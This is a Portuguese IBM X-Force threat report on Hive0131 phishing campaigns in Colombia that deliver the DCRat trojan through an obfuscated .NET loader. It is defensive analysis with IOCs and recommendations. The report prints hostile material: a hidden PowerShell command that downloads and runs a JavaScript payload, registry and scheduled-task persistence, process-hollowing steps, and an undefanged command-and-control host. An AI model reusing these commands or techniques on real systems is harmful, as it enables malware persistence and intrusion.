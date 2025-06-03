Tags
IBM X-Force Threat Analysis: presença da DCRat crescendo na América Latina

Uma mão digitando em um notebook com escudo de segurança vermelho e gráficos de e-mail flutuando sobre o teclado

No início de maio de 2025, a IBM X-Force observou que o Hive0131 conduzia campanhas por e-mail direcionadas a usuários na Colômbia com notificações eletrônicas de processos criminais, alegando ser do Poder Judicial da Colômbia. Hive0131 é um grupo com motivação financeira, provavelmente originário da América do Sul, que conduz campanhas rotineiramente em grande parte na América Latina (LATAM) para entregar uma ampla variedade de cargas úteis de commodities. As campanhas atuais imitam a correspondência oficial e contêm um link incorporado ou uma isca em PDF com um link incorporado. Clicar no link incorporado iniciará a cadeia de infecção para executar o trojan bancário "DCRat" na memória. 

O DCRat é operado como um Malware-as-a-Service (MaaS), aparecendo pela primeira vez em pelo menos 2018, e fortemente anunciado nos fóruns de crime cibernético russos, comprado por cerca de USD 7 por uma assinatura de dois meses. A presença do DCRat é generalizada e se tornou cada vez mais popular na América Latina desde pelo menos 2024. Durante o verão de 2024, a X-Force observou várias campanhas direcionadas fortemente a entidades na Colômbia, todas imitando uma empresa da América Latina especializada em ecossistemas de documentos eletrônicos no México e na Colômbia. No entanto, dadas as diferenças na cadeia de infecção e na entrega do DCRat, a X-Force avalia que as campanhas de 2024 e atuais foram conduzidas por agentes diferentes. As campanhas observadas em 2024 dependiam muito de arquivos rar protegidos por senha contendo NSIS para executar um downloader GuLoader, enquanto essas campanhas recentes dependem de um carregador .NET ofuscado que chamamos de VMDetectLoader. 

Recursos do DCRat

  • Ignora o AMSI
  • Detecta ambientes de análise
  • Elimina processos incluídos em listas de bloqueio
  • Obtém persistência por meio de uma tarefa agendada ou chave de registro
  • Detecta comandos de um servidor de comando e controle (C2)

O DCRat vem com plug-ins capazes de realizar as seguintes tarefas, embora os agentes de ameaças possam criar plug-ins personalizados para realizar tarefas adicionais:

  • Registrar uma vítima através do microfone ou câmera do computador
  • Upload e download de arquivos
  • Executar comandos
  • Obtenção de informações do sistema
  • Criptografia e descriptografia de arquivos
  • Edição de chaves de registro
  • Registro de pressionamentos de tecla e dados da área de transferência
  • Manipulação do sistema de arquivos

Tipo de ameaça

MaaS

Homem olhando para computador

Análise

No início de maio de 2025, a X-Force observou campanhas de e-mail Hive0131 imitando o Poder Judicial da Colômbia (Rama Judicial de Colômbia), alegando ser do Circuito Civil de Bogotá, Colômbia, para enviar notificações eletrônicas de processos criminais. As campanhas observadas contêm uma isca em PDF com um link para um TinyURL ou contêm um link incorporado para um local do Google Docs. 

Visão geral da cadeia de infecção - PDF com MinyURL

Para os e-mails contendo uma isca em PDF que leva a um thinurl, a vítima é redirecionada para um arquivo ZIP chamado 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. O arquivo ZIP contém arquivos benignos, bem como um arquivo JavaScript malicioso chamado 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue O arquivo JavaScript baixa uma carga útil de JavaScript de um site paste[.]ee  e o executa. Essa carga útil então executa um comando do PowerShell que faz download de um JPG de hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg com um carregador codificado em base64 anexado ao final do arquivo. Uma vez executado, o carregador faz download e executa o DCRat na memória.

O carregador recebe o nome de VMDetectLoader devido à sua capacidade de determinar se está sendo executado em uma área de testes. A análise indica que o carregador é baseado no projeto de código aberto https://github.com/robsonfelix/VMDetector.

Cadeia de Infecção do RAMA
Figura 1: Cadeia de infecção do RAMA
Exemplo de e-mail com isca em PDF
Figura 2: Exemplo de e-mail com isca em PDF

Visão geral da cadeia de infecção - Link incorporado do Google Docs

Essa cadeia de infecção é iniciada com e-mails de phishing que contêm um link para um download do Google Docs de um arquivo ZIP protegido por senha chamado CUI 158616000129-2025-10047_122011111777.zip, a senha do qual está no e-mail e é 3004. O arquivo contém um downloader em lote, CUI 158616000129-2025-10047_122011111777.bat, que baixa e executa um componente VBScript (VBS) ofuscado a partir dehxxp://paste[.]ee/d/jYHEqBJ3/0  para%WinDir%\Temp\Pernambuco.vbs. Em seguida, o script VBS decodifica e executa um script PowerShell codificado em base64, que baixa o VMDetectLoader por meio de um arquivo JPG a partir dehxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
A carga útil final é então baixada pelo VMDetectLoader por meio de um URL do paste[.]ee passado a ele pelo script PowerShell.a ele pelo script PowerShell.

Cadeia de infecção RAMA com o Google Docs
Figura 3: cadeia de infecção RAMA com o Google Docs
Exemplo de e-mail com link do Google Docs
Figura 4: Exemplo de e-mail com link do Google Docs

VMDetectLoader

VMDetectLoader é um carregador ofuscado .NET (Microsoft.Win32.TaskScheduler.dll) que pode ser encontrado no VirusTotal em https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. A análise dos metadados do carregador indica que o código é baseado no projeto de código aberto https://github.com/robsonfelix/VMDetector.

Atributos de assembly:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Antes de carregar a carga útil, o carregador detecta máquinas virtuais, imprimindo uma lista de atributos de host no console, caso uma VM seja detectada. Por exemplo:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Funcionalidade

O VMDetectLoader é executado por meio de sua função dnlib.IO.Home.VAI()  e recebe dados semelhantes aos apresentados a seguir. Essas informações podem variar dependendo da campanha.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argumento

Descrição

$storeman

 URL do Pastee invertida, a partir da qual é baixado uma carga útil codificada em base64. 

MSBuilld

 Processo de injeção de alvo

C:\Users\Public\Downloads
rhabdosteus
js

 Caminho usado na criação de uma tarefa agendada: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Sinalização que indica verificações de processo

bimetallism

 Nome da tarefa agendada

Durante a execução, o VMDetectLoader descriptografa por XOR strings relevantes conforme necessário a partir do recurso .NET “hIXS”.

Uma amostra de strings descriptografadas dentro de pastas

Exemplos de strings descriptografadas

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistência

Se configurado para isso, é criada uma tarefa agendada para executar o seguinte comando do PowerShell, que baixa e executa uma carga útil de JavaScript:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Talvez outra tarefa seja criada, se configurada, para executar a carga útil do JavaScript usando o seguinte comando:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

O carregador também pode criar uma chave de execução do Registro para executar a carga útil:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Injeção de processo

O VMDetectLoader tem a capacidade de usar a técnica de injeção de detalhamento do processo para carregar uma carga útil em várias instâncias do processo de destino. Por exemplo, para a campanha analisada, C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit) ou C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64 bits) é o processo de destino. A função responsável pela injeção de processo é nomeada HackForums.gigajew.x64.Load() para amostras de 64 bits e dnlib.IO.Tools.Ande() para amostras de 32 bits.

Processo de moldagem por injeção:

  1. Crie um processo suspenso usando CreateProcess() com o dwCreationFlags definido como CREATE_SUSPENDED (4).
  2. Desmapeie a memória no processo de destino usando ZwUnmapViewOfSection().
  3. Aloque nova memória no processo de destino usando VirtualAllocEx().
  4. Escreva a carga útil na memória recém-alocada usando WriteProcessMemory().
  5. Atualize o ponto de entrada do processo utilizando GetThreadContext() SetThreadContex().
  6. Execute ResumeThread() para executar o código.

DCRat

Se o VMDetectLoader determinar que está sendo executado em um ambiente seguro, a carga útil final será carregada por meio de esvaziamento de processo. Nesta instância, a carga útil final é DCRat com os seguintes dados de configuração.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Conclusão

A X-Force rastreia vários grupos que operam no cenário de ameaças da América Latina e que realizam campanhas de e-mail que entregam MaaS com o objetivo de ganho financeiro. Entre os grupos monitorados estão o Hive0148 e o Hive0149, que se concentram no fornecimento do Trojan Banking Grandoriero, o Hive0153, que utiliza malware Advent e SambaSpy, e o Hive0131. Embora o Hive0131 normalmente se concentre em operações com a entrega de malware, como QuasarRAT e NjRAT, a X-Force observou um aumento em campanhas envolvendo o DCRat. Com a observação constante e contínua de malware bancário entregue aos usuários na LATAM, a IBM X-Force avalia que a América Latina continuará sendo alvo de agentes de ameaças que buscam implementar trojans bancários por meio de campanhas de phishing na tentativa de obter credenciais de usuários e outras informações confidenciais.

Recomendações

As entidades na LATAM são incentivadas a ter cuidado com e-mails que contenham anexos, links ou que contenham downloads de arquivos. Além disso, as entidades são aconselhadas a realizar o seguinte:

  • Exercite cautela com e-mails que contenham links ou prompts de download
  • Monitorar evidências baseadas no host de injeção de processos, criação de processos não autorizados, criação de tarefas agendadas e modificações de registro
  • Instalar, atualizar e configurar software de segurança de endpoint
  • Monitore as regras de endpoint
  • Busca pelo desvio da política de execução

Indicadores de compromisso

Indicador

 Tipo de indicador

  Contexto

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 Arquivo portador 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 Arquivo ZIP

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Carregador .NET ofuscado

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 Arquivo ZIP

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 Script PS

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 Script PS

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Downloader de scripts em lote

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Link do PDF incorporado

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 URL de download da carga útil

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Link de e-mail incorporado

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 URL de download da carga útil

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 URL de download de JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 URL de download de JPG

O IBM X-Force Premier Threat Intelligence agora está integrado ao OpenCTI, fornecendo inteligência de ameaças praticável sobre essas atividades e muito mais. Acesse insights sobre agentes de ameaças, malware e riscos do setor. Instale o Conector OpenCTI para aprimorar a detecção e a resposta, fortalecendo sua cibersegurança com a expertise do IBM X-Force. Saia na frente —integre hoje mesmo.

